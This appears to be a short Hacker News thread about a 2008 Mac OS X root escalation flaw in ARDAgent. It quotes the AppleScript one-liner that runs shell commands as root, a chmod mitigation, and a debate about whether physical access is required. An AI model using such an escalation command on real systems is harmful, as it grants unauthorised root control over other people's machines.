

Mac OS X Root Escalation Attack - timr
http://it.slashdot.org/article.pl?sid=08/06/18/1919224

======
bayareaguy
The slashdot summary: _Half the Mac OS X boxes in the world (confirmed on Mac
OS X 10.4 Tiger and 10.5 Leopard) can be rooted through AppleScript:_

    
    
      osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; 
    

_Works for normal users and admins, provided the normal user wasn't switched
to via fast user switching. Secure? I think not._

Wow, time to

    
    
      sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent
    

just like patrick42 suggests.

------
yan
While yes this is an issue that should be solved, it's not /that/ bad. You
need physical access to the machine as people in comments point out, and if
you have physical access to the machine it's game over anyway.

~~~
swombat
Since when do you need physical access to the machine to run an applescript?

You just need to convince the user to execute a piece of code.

